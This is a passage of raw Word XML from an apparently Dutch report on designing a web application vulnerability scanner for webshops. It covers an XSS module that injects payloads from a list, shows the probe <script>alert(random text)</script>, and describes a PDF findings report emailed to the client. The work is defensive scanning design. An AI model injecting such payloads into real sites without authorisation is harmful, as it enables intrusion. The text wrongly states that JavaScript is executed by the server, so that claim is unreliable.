                              <w:t>Figure 4.18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23421" id="Text Box 239" o:spid="_x0000_s1100" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.15pt;margin-top:143.9pt;width:453.6pt;height:21.25pt;z-index:25199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6DzjoCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EmAptRKgYFdMk1FaC&#10;qc/GcYgl2+fZhoT9+p2dhHbdnqa9mPPd+bt8392xuG+1ImfhvART0MloTIkwHEppjgX9vt98uqXE&#10;B2ZKpsCIgl6Ep/fLjx8Wjc3FFGpQpXAEQYzPG1vQOgSbZ5nntdDMj8AKg8EKnGYBr+6YlY41iK5V&#10;Nh2PZ1kDrrQOuPAevQ9dkC4TflUJHp6qyotAVEHx20I6XToP8cyWC5YfHbO15P1nsH/4Cs2kwaJX&#10;qAcWGDk5+QeUltyBhyqMOOgMqkpykTggm8n4HZtdzaxIXFAcb68y+f8Hyx/Pz47IsqDTz3eUGKax&#10;SXvRBvIFWhJ9qFBjfY6JO4upocUAdnrwe3RG4m3ldPxFSgTjqPXlqm+E4+i8mc/G8ymGOMams7vb&#10;+U2EyV5fW+fDVwGaRKOgDvuXZGXnrQ9d6pASi3lQstxIpeIlBtbKkTPDXje1DKIH/y1LmZhrIL7q&#10;ADuPSMPSV4mEO2LRCu2hTRLN5gPrA5QXFMNBN1De8o3E8lvmwzNzOEFIErciPOFRKWgKCr1FSQ3u&#10;59/8MR8bi1FKGpzIgvofJ+YEJeqbwZbH8R0MNxiHwTAnvQYkPsF9szyZ+MAFNZiVA/2Cy7KKVTDE&#10;DMdaBQ2DuQ7dXuCycbFapSQcUsvC1uwsj9CDzPv2hTnbNylgex9hmFWWv+tVl5u6ZVengMKnRkZh&#10;OxVxAOIFBzyNQr+McYPe3lPW61/G8hcAAAD//wMAUEsDBBQABgAIAAAAIQCXmQxF4AAAAAgBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUhcELVpSn9CnKqq4ACXitBLb268jQOxHdlO&#10;G96e5QTHnRnNflOsR9uxM4bYeifhYSKAoau9bl0jYf/xcr8EFpNyWnXeoYRvjLAur68KlWt/ce94&#10;rlLDqMTFXEkwKfU557E2aFWc+B4deScfrEp0hobroC5Ubjs+FWLOrWodfTCqx63B+qsarITd7LAz&#10;d8Pp+W0zy8LrftjOP5tKytubcfMELOGY/sLwi0/oUBLT0Q9OR9ZJyCgnYbpc0ACyV2LxCOxIeiYy&#10;4GXB/w8ofwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCRLoPOOgIAAHoEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCXmQxF4AAAAAgBAAAPAAAA&#10;AAAAAAAAAAAAAJIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7E221EC5" w14:textId="16ADE2F0" w:rsidR="00CE4BB5" w:rsidRPr="005461F6" w:rsidRDefault="00CE4BB5" w:rsidP="00397BB2">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.18</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251993088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4DDA2701" wp14:editId="1A657AD2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="1770380"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:wrapTopAndBottom/>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DBMS - errors.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1770380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00FE50C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404862E" w14:textId="64BA8A75" w:rsidR="00460966" w:rsidRPr="006B43C8" w:rsidRDefault="00460966" w:rsidP="00C11437">
      <w:r w:rsidRPr="00460966">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE14B66" w14:textId="741DFD2E" w:rsidR="00F86B94" w:rsidRDefault="00EF5705" w:rsidP="00C11437">
      <w:r>
        <w:t xml:space="preserve">Voor de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>XSS module</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00325BAF">
        <w:t>is e</w:t>
      </w:r>
      <w:r w:rsidR="00164DAE">
        <w:t>r geen voor gedefinieerde lijst</w:t>
      </w:r>
      <w:r w:rsidR="00182BAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000921A2">
        <w:t>met J</w:t>
      </w:r>
      <w:r w:rsidR="00B20FC6">
        <w:t>avascript</w:t>
      </w:r>
      <w:r w:rsidR="00B363FB">
        <w:t xml:space="preserve"> code regels</w:t>
      </w:r>
      <w:r w:rsidR="000921A2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C06AD1">
        <w:t xml:space="preserve"> omdat je niet te maken hebt met gestandaardiseerde teksten zoals bij SQL di</w:t>
      </w:r>
      <w:r w:rsidR="008451B1">
        <w:t>e bij een error een bericht</w:t>
      </w:r>
      <w:r w:rsidR="000402BF">
        <w:t xml:space="preserve"> toont maar wat Javascript wel kan is script runnen.</w:t>
      </w:r>
      <w:r w:rsidR="00C11437">
        <w:t xml:space="preserve"> Met andere woorden er kan Javascript code verstuurd worden naar de server die het dan verwerkt.</w:t>
      </w:r>
      <w:r w:rsidR="00AF002D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD22A8">
        <w:t xml:space="preserve">Zoals er </w:t>
      </w:r>
      <w:r w:rsidR="00C06AD1">
        <w:t>in Hoofdstuk 3.2.2 behandeld</w:t>
      </w:r>
      <w:r w:rsidR="005325F4">
        <w:t xml:space="preserve"> wordt kunnen er </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00612A64">
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidR="005325F4">
        <w:t>elementen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AB6B43">
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidR="00A10C2D">
        <w:t xml:space="preserve"> “&lt;script&gt;”</w:t>
      </w:r>
      <w:r w:rsidR="005325F4">
        <w:t xml:space="preserve"> geplaatst worden</w:t>
      </w:r>
      <w:r w:rsidR="00EC2FD2">
        <w:t xml:space="preserve"> op een HTML pagina</w:t>
      </w:r>
      <w:r w:rsidR="005561C9">
        <w:t>. Tussen twee van deze elementen kan J</w:t>
      </w:r>
      <w:r w:rsidR="007007F6">
        <w:t xml:space="preserve">avascript code geplaatst worden </w:t>
      </w:r>
      <w:r w:rsidR="005B438F">
        <w:t>dat d</w:t>
      </w:r>
      <w:r w:rsidR="00B96DCF">
        <w:t>oor de server wordt uitgevoerd.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2FD2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00216D53">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00216D53">
        <w:t>XSS module</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00216D53">
        <w:t xml:space="preserve"> gebruikt deze fea</w:t>
      </w:r>
      <w:r w:rsidR="00D87722">
        <w:t>ture om zelf opmaat</w:t>
      </w:r>
      <w:r w:rsidR="00216D53">
        <w:t xml:space="preserve"> gemaakte XSS script op de HTML pagina van de doelwit te plaatsen</w:t>
      </w:r>
      <w:r w:rsidR="000D5806">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000D5806">
        <w:t>XSS module</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000D5806">
        <w:t xml:space="preserve"> maakt gebruik van een </w:t>
      </w:r>
      <w:r w:rsidR="00C11437">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="000D5806">
        <w:t>, deze bevat</w:t>
      </w:r>
      <w:r w:rsidR="00C11437">
        <w:t xml:space="preserve"> een lijst met XSS aanvallen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4809DC2E" w14:textId="77777777" w:rsidR="00C11437" w:rsidRDefault="00C11437" w:rsidP="00C11437">
      <w:r>
        <w:t>Voorbeelden van de payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3709989C" w14:textId="77777777" w:rsidR="00E63E7B" w:rsidRDefault="00C11437" w:rsidP="00E63E7B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C8CA9F" wp14:editId="2A1210F3">
            <wp:extent cx="5760720" cy="561340"/>
            <wp:effectExtent l="0" t="0" r="508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XSS payload.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="561340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D509DF6" w14:textId="149E0B2F" w:rsidR="00C11437" w:rsidRDefault="00E63E7B" w:rsidP="00E63E7B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 4.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062A16EB" w14:textId="68CC93F7" w:rsidR="00BF5716" w:rsidRPr="0022053B" w:rsidRDefault="00027D9D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Het zijn opmaat</w:t>
      </w:r>
      <w:r w:rsidR="00341002">
        <w:t xml:space="preserve"> gemaakte XSS aanvallen omdat de Scanner component </w:t>
      </w:r>
      <w:r w:rsidR="00854D47">
        <w:t>een deel van een payload</w:t>
      </w:r>
      <w:r w:rsidR="00AB58CD">
        <w:t xml:space="preserve"> vervangt</w:t>
      </w:r>
      <w:r w:rsidR="00854D47">
        <w:t xml:space="preserve"> e.g. regel 1 (Figuur 4.19)</w:t>
      </w:r>
      <w:r w:rsidR="00CC0F31">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00854D47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E11F38">
        <w:t>De</w:t>
      </w:r>
      <w:r w:rsidR="00690D34">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00690D34" w:rsidRPr="00690D34">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>__XSS__</w:t>
      </w:r>
      <w:r w:rsidR="000E249A">
        <w:rPr>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC0F31">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">wordt vervangen </w:t>
      </w:r>
      <w:r w:rsidR="00005767">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>door een willekeurig</w:t>
      </w:r>
      <w:r w:rsidR="00191377">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">e gegenereerde </w:t>
      </w:r>
      <w:r w:rsidR="00A50EF5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>tekst bestaand uit 10</w:t>
      </w:r>
      <w:r w:rsidR="00E5337A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> karakters</w:t>
      </w:r>
      <w:r w:rsidR="00191377">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> van letters en numm</w:t>
      </w:r>
      <w:r w:rsidR="00A42537">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ers,</w:t>
      </w:r>
      <w:r w:rsidR="00CE71CD">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002832A0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.</w:t>
      </w:r>
      <w:r w:rsidR="00B4245F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">g. </w:t>
      </w:r>
      <w:r w:rsidR="00EC7618">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:r w:rsidR="00501CA1" w:rsidRPr="00501CA1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>34c829ctn</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00501CA1" w:rsidRPr="00501CA1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00EC7618">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EC7618">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00A42537">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7E63F" w14:textId="77777777" w:rsidR="009115FF" w:rsidRDefault="009115FF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023E6689" w14:textId="0586D3F4" w:rsidR="00D86494" w:rsidRPr="001D1C39" w:rsidRDefault="003C663C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00690D34">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D86494">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="347724F4" w14:textId="6522B9BC" w:rsidR="00773100" w:rsidRPr="00773100" w:rsidRDefault="00D3619C" w:rsidP="00726B17">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc491022086"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.4.4 Rapporteren</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="1D75B139" w14:textId="6841AFFA" w:rsidR="008B67D5" w:rsidRDefault="00B6130A" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252013568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B08E708" wp14:editId="5F93F63F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>304165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5652135" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="37465" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="254" name="Text Box 254"/>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56B1642" w14:textId="578EDF59" w:rsidR="00CE4BB5" w:rsidRPr="00A5117E" w:rsidRDefault="00CE4BB5" w:rsidP="00B6130A">
                            <w:r w:rsidRPr="00A5117E">
                              <w:t>B</w:t>
                            </w:r>
                            <w:r>
                              <w:t>usiness Doel</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00A5117E">
                              <w:t>: Het genereren van een rapport op basis van de gevonden kwetsbaarheden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08E708" id="Text Box 254" o:spid="_x0000_s1101" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:23.95pt;width:445.05pt;height:27pt;z-index:25201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q9GyYsCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFRLbxoxEL5X6n+wfG8WCKQJYokoUapKURI1&#10;qXI2Xhus2h7XNuzSX9+xdxdQmkuqXnbHM9+8H7PrxmiyEz4osCUdng0oEZZDpey6pD+ebz9dUhIi&#10;sxXTYEVJ9yLQ6/nHD7PaTcUINqAr4QkasWFau5JuYnTTogh8IwwLZ+CERaEEb1jEp18XlWc1Wje6&#10;GA0GF0UNvnIeuAgBuTetkM6zfSkFjw9SBhGJLinGFvPX5+8qfYv5jE3XnrmN4l0Y7B+iMExZdHow&#10;dcMiI1uv/jJlFPcQQMYzDqYAKRUXOQfMZjh4lc3ThjmRc8HiBHcoU/h/Zvn97tETVZV0NBlTYpnB&#10;Jj2LJpIv0JDEwwrVLkwR+OQQGhsUYKd7fkBmSryR3qQ/pkRQjrXeH+qbzHFkTi4mo+H5hBKOsvPx&#10;6GqQG1ActZ0P8asAQxJRUo/9y2Vlu7sQMRKE9pDkzMKt0jr3UNvECKBVlXj5kYZILLUnO4btj00O&#10;Gk2coPDVaoo8LJ2XlHCbWKbiXotkUNvvQmKxcn5veGCcCxt7LxmdUBLjeY9ih0+qbVTvUT5oZM9g&#10;40HZKAs+VzNv17Ew1c8+ZNnisc4neScyNqsmT8nFZd/4FVR7nAcP7U4Fx28VNu2OhfjIPC4RjgAe&#10;hviAH6mhLil0FCUb8L/f4ic8zjZKKalxKUsafm2ZF5Tobxan/mo4Hqctzo/x5PMIH/5UsjqV2K1Z&#10;AjZ+iCfI8UwmfNQ9KT2YF7wfi+QVRcxy9I2T0pPL2J4KvD9cLBYZhHvrWLyzT44n06nMaSSfmxfm&#10;XTe3ESf+Hvr1ZdNX49tik6aFxTaCVHm2U6HbqnYNwJ3PI9/dp3RUTt8Zdbyi8z8AAAD//wMAUEsD&#10;BBQABgAIAAAAIQA3S5xO3wAAAAcBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9Ba8JAFITvhf6H5RV6&#10;q7spRU3MRlpFKGIPahGPa/Y1Cc2+DdlV47/v66k9DjPMfJPPB9eKC/ah8aQhGSkQSKW3DVUaPver&#10;pymIEA1Z03pCDTcMMC/u73KTWX+lLV52sRJcQiEzGuoYu0zKUNboTBj5Dom9L987E1n2lbS9uXK5&#10;a+WzUmPpTEO8UJsOFzWW37uz0/C+v623k8XH2K3flsfNQYbDarnR+vFheJ2BiDjEvzD84jM6FMx0&#10;8meyQbQa+EjU8DJJQbA7TVUC4sQxlaQgi1z+5y9+AAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA&#10;+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgA&#10;AAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgA&#10;AAAhAAKvRsmLAgAAjQUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAG&#10;AAgAAAAhADdLnE7fAAAABwEAAA8AAAAAAAAAAAAAAAAA4wQAAGRycy9kb3ducmV2LnhtbFBLBQYA&#10;AAAABAAEAPMAAADvBQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="356B1642" w14:textId="578EDF59" w:rsidR="00CE4BB5" w:rsidRPr="00A5117E" w:rsidRDefault="00CE4BB5" w:rsidP="00B6130A">
                      <w:r w:rsidRPr="00A5117E">
                        <w:t>B</w:t>
                      </w:r>
                      <w:r>
                        <w:t>usiness Doel</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00A5117E">
                        <w:t>: Het genereren van een rapport op basis van de gevonden kwetsbaarheden</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5CB818" w14:textId="77777777" w:rsidR="00BA25A8" w:rsidRDefault="00BA25A8" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACD2537" w14:textId="50CF501B" w:rsidR="00D57B57" w:rsidRDefault="00F750E6" w:rsidP="008571B9">
      <w:r>
        <w:t>Al</w:t>
      </w:r>
      <w:r w:rsidR="00A45A50">
        <w:t xml:space="preserve">s uitgangspunt </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">maakt de Web Applicatie Scanner een rapport aan gebaseerd op de geïdentificeerde kwetsbaarheden. </w:t>
      </w:r>
      <w:r w:rsidR="00A45A50">
        <w:t xml:space="preserve">Het doel van dit rapport is om de klant te informeren </w:t>
      </w:r>
      <w:r w:rsidR="00867A91">
        <w:t xml:space="preserve">over de security staat waar de webshop in verkeerd. </w:t>
      </w:r>
      <w:r w:rsidR="007A73EF">
        <w:t xml:space="preserve">Het rapport zal gegenereerd worden in </w:t>
      </w:r>
      <w:r w:rsidR="001609F7">
        <w:t>pdf-formaat</w:t>
      </w:r>
      <w:r w:rsidR="007A73EF">
        <w:t xml:space="preserve"> en zal informatie bevatten over alle gevonde</w:t>
      </w:r>
      <w:r w:rsidR="001609F7">
        <w:t xml:space="preserve">n kwetsbaarheden in de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001609F7">
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001609F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E2671">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1849">
        <w:t xml:space="preserve">Na dat het rapport is gegenereerd wordt het via e-mail verstuurd naar de desbetreffende klant. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F84011" w14:textId="312534B0" w:rsidR="006620A2" w:rsidRPr="00B54E8F" w:rsidRDefault="006F7A2B" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54E8F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inhoud</w:t>
      </w:r>
      <w:r w:rsidR="006620A2" w:rsidRPr="00B54E8F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>: Welke data bevat het rapport</w:t>
      </w:r>
      <w:r w:rsidR="00E36920" w:rsidRPr="00B54E8F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A41CD" w14:textId="14FD4CF0" w:rsidR="00687310" w:rsidRDefault="002E5BDB" w:rsidP="008571B9">
      <w:r>
        <w:t>Het rapport heeft als doel de lezer</w:t>
      </w:r>
      <w:r w:rsidR="005609D2">
        <w:t xml:space="preserve"> een </w:t>
      </w:r>
      <w:r>
        <w:t>leesbaar</w:t>
      </w:r>
      <w:r w:rsidR="005609D2">
        <w:t xml:space="preserve"> overzicht van alle geïdentificeerde kwetsbaarheden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te geven. Naast dat wordt de lezer ook van algemene informatie voorzien en wordt er ook een advies gegeven over de mogelijke vervolg s</w:t>
      </w:r>
      <w:r w:rsidR="005D3D3D">
        <w:t>tappen om tot een oplossing van het probleem te komen.</w:t>
      </w:r>
      <w:r w:rsidR="007E55A5">
        <w:t xml:space="preserve"> Het rapport bevat de volgende </w:t>
      </w:r>
      <w:r w:rsidR="007A0A1E">
        <w:t>data:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1844"/>
        <w:gridCol w:w="2876"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A654A" w14:paraId="2066F5FF" w14:textId="77777777" w:rsidTr="00C0502B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="07DFAC8D" w14:textId="132D944C" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t xml:space="preserve">Algemene </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>informatie pagina</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="2E2E9BA1" w14:textId="77777777" w:rsidTr="00756B56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65C2F2FC" w14:textId="4D153B51" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Veld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
